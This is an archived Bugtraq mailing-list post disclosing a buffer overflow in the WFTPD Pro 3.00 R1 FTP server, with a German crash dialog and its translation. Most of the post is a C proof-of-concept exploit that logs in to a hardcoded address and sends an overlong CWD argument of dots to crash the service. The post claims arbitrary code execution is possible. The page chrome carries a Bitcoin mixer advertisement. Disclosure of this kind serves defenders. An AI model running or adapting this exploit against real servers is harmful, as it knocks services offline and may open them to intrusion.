+++ to secure your transactions use the Bitcoin Mixer Service +++

 

We need Your Support. Make a Donation now! or Buy Me A Coffee

Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

WFTPD Pro 3.00 R1 Buffer Overflow

From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:51:52 -0000
When sending a command (cwd) followed by a long 
argument (~500 char '.')
the server crashes with:


Anwendungspopup: WFTPD Service Control: 
WFTPD.EXE - Fehler in Anwendung: 
Die Anweisung in "0x2e2e2e2e" verweist auf 
Speicher 
in "0x2e2e2e2e". Der Vorgang
"read" konnte nicht auf dem Speicher durchgeführt 
werden.

which means in English: Exception fault at: 
0x2e2e2e2e
reading from 0x2e2e2e2e is not possible...


Executing arbitrary code is possible


The author has been contacted

----------------------
se00020 () fhs-hagenberg ac at or
se00020 () lion cc

Tested on win2k using trail version of WFTPD 3.00 
R1


Simple exploit:

//WFTPD Pro 3.00 R1 Buffer Overflow exploit
//written by se00020 () fhs-hagenberg ac at

#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#include <malloc.h>

void main(){
        SOCKET sock_victim;
        WORD version=MAKEWORD(1,1);
        WSADATA wsadata;
        SOCKADDR_IN victim;
        int sockid;
        char buffer[1024];
        char exploitbuffer[800]={"CWD "};
        char recvbuffer[1024];



        WSAStartup(version, &wsadata);
        
        sock_victim=socket(AF_INET, 
SOCK_STREAM, IPPROTO_TCP);
        victim.sin_family=AF_INET;
        victim.sin_addr.s_addr=inet_addr
("10.17.3.44");
        victim.sin_port=htons(21);
        sockid=connect(sock_victim, (sockaddr*) 
&victim, sizeof(victim));
        
    
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
        memset(recvbuffer, '/0',sizeof(recvbuffer));
        send(sock_victim, "USER test\r\n",strlen
("USER test\r\n"),0);
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
        memset(recvbuffer, '/0',sizeof(recvbuffer));
        send(sock_victim, "PASS\r\n",strlen
("PASS\r\n"),0);
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
        memset(recvbuffer, '/0',sizeof(recvbuffer));
        

        memset(exploitbuffer+4,'.',sizeof
(exploitbuffer)-4);
        sprintf(buffer,"%s\r\n",exploitbuffer);
        
        send(sock_victim, buffer , sizeof(buffer),0);
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);

        closesocket(sockid);
        closesocket(sock_victim);

}
Previous By Date Next
Previous By Thread Next

Current thread:

We need Your Support. Make a Donation now! or